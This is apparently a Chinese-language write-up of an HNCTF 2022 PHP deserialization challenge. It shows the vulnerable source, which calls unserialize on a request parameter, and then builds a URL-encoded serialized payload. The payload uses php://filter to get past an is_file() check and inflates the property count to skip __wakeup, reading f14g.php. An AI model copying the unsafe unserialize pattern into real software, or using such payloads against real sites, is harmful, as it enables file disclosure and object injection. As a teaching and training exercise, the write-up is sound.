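// NOTE(review): the listing is cut off above this point on the page. The line
// below is the tail of a method whose start is not shown, and the header of
// the enclosing class (named "body" elsewhere on the page) is missing too.
want = $want; else $this->want = $this->todonothing; }

    /**
     * Called by PHP when an object of this class is rebuilt by unserialize().
     * Overwrites $want with a fixed marker string and prints a message, so a
     * value carried in the serialized data does not survive this hook.
     */
    function __wakeup(){
        $About_me = "When the object is unserialized,I will be called";
        $but = "I can CHANGE you";
        $this->want = $but;
        echo "C1ybaby!";
    }

    /**
     * Called by PHP when the object is destroyed.
     * Runs three checks on $want and, if none of them stops the script,
     * passes $want to highlight_file().
     */
    function __destruct(){
        // Repaired string literal: the page shows "I"m ...", which is a syntax error.
        $About_me = "I'm the final function,when the object is destroyed,I will be called";
        echo "So,let me see if you can get what you want\n";
        // $want still equal to $todonothing: stop.
        if($this->todonothing === $this->want)
            die("鲍勃,别傻愣着!\n");
        // $want holds the marker written by __wakeup(): stop.
        if($this->want == "I can CHANGE you")
            die("You are not you....");
        // NOTE(review): this is a denylist (one literal file name plus is_file()).
        // Any value for which is_file() is false still reaches highlight_file(),
        // and $want is attacker-controlled when the object comes from unserialize().
        // An allowlist of permitted paths would be the safer design.
        if($this->want == "f14g.php" OR is_file($this->want)){
            die("You want my heart?No way!\n");
        }else{
            echo "You got it!";
            highlight_file($this->want);
        }
    }
}

/**
 * Demo class that prints a message from __sleep() and returns $CORE when
 * it is used as a string.
 */
class unserializeorder{
    public $CORE = "人类最大的敌人,就是无序. Yahi param vaastavikta hai!
";

    /**
     * Called by PHP when the object is serialized; only prints a banner.
     * NOTE(review): PHP expects __sleep() to return an array of property
     * names; this one returns nothing.
     */
    function __sleep(){
        $About_me = "When the object is serialized,I will be called";
        echo "We Come To HNCTF,Enjoy the ser14l1zti0n
";
    }

    /**
     * Called by PHP when the object is used as a string.
     */
    function __toString(){
        $About_me = "When the object is used as a string,I will be called";
        return $this->CORE;
    }
}

// Prints $CORE through __toString(), then serializes the object (runs __sleep()).
$obj = new unserializeorder();
echo $obj;
$obj = serialize($obj);

if (isset($_GET["ywant"]))
{
    // SECURITY: unserialize() on a request parameter lets the client choose
    // which loaded class is instantiated and which property values it holds,
    // and its magic methods (__wakeup/__destruct) then run on that data.
    // Prefer json_decode() for client-supplied data, or restrict classes with
    // unserialize($data, ['allowed_classes' => false]). The @ operators also
    // hide the warnings that malformed input would produce.
    $ywant = @unserialize(@$_GET["ywant"]);
    echo $ywant;
}
?>人类最大的敌人,就是无序. Yahi param vaastavikta hai!We Come To HNCTF,Enjoy the ser14l1zti0n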
首先看代码可知,flag在f14g.php中,所以我们只要找到能够利用的点就可以了。
往上看可以看到body类中highlight_file()可以进行利用,所以说我们需要让want为我们想要的f14g.php就可以了。
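/**
 * Called by PHP when the object is destroyed.
 * Runs three checks on $this->want and, if none of them stops the script,
 * passes $this->want to highlight_file().
 */
function __destruct(){
    // Repaired string literal: the page shows "I"m ...", which is a syntax error.
    $About_me = "I'm the final function,when the object is destroyed,I will be called";
    echo "So,let me see if you can get what you want\n";
    // $want still equal to $todonothing: stop.
    if($this->todonothing === $this->want)
        die("鲍勃,别傻愣着!\n");
    // $want holds the marker string "I can CHANGE you": stop.
    if($this->want == "I can CHANGE you")
        die("You are not you....");
    // NOTE(review): this is a denylist (one literal file name plus is_file()).
    // Any value for which is_file() is false still reaches highlight_file(),
    // so the argument is not limited to an intended set of files. An allowlist
    // of permitted paths would be the safer design.
    if($this->want == "f14g.php" OR is_file($this->want)){
        die("You want my heart?No way!\n");
    }else{
        echo "You got it!";
        highlight_file($this->want);
    }
}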
但是这边过滤得比较严:若 want 等于 f14g.php,或者 is_file($this->want) 为真(即该路径是一个存在的普通文件),脚本在输出 "So,let me see if you can get what you want\n" 之后就会以 "You want my heart?No way!\n" 直接 die,不会执行到 highlight_file()。
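所以我们不能直接让 want=f14g.php,这里可以用 php://filter 伪协议来回显 f14g.php 文件。原因是 php:// 这类流包装器不支持 stat(),is_file() 对它返回 false,同时该字符串也不等于 "f14g.php",两个条件都不成立,而 highlight_file() 仍然可以通过包装器读到文件内容。这也说明仅靠文件名黑名单加 is_file() 并不能限制 highlight_file() 的参数,应当改用允许列表。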
构造如下:
"; }$a=new body();echo urlencode(serialize($a));?>
payload:?ywant=O%3A4%3A"body"%3A2%3A{s%3A10%3A"%00body%00want"%3Bs%3A30%3A"php%3A%2F%2Ffilter%2Fresource%3Df14g.php"%3B}
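这里注意还需要绕过 __wakeup 魔术方法(否则 want 会被改写为 "I can CHANGE you"):序列化字符串中类名之后、两个 %3A 之间的属性个数原本为 1,现在改为 2。当声明的属性个数大于实际个数时,存在该问题的旧版本 PHP 会跳过 __wakeup,已修复的版本则不会。从防御角度看,根本问题在于对用户可控的输入调用了 unserialize(),而不是 __wakeup 本身。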
关键词:
世界观焦点:[HNCTF 2022 WEEK2]